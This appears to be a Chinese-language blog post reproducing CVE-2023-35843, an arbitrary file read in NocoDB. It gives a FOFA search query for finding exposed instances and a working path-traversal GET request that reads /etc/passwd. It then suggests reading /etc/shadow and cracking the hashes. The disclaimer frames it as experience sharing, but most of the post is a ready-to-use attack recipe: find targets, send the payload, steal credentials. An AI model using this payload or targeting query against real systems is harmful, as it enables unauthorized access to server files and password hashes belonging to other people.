漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二:漏洞影响版本

version<=0.106.1

三:网络空间测绘查询

fofa:
icon_hash=“-2017596142”
漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)_第1张图片

四:漏洞复现

poc

GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)_第2张图片
漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)_第3张图片

五:漏洞利用

可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作

你可能感兴趣的:(漏洞复现,网络安全,web安全,安全)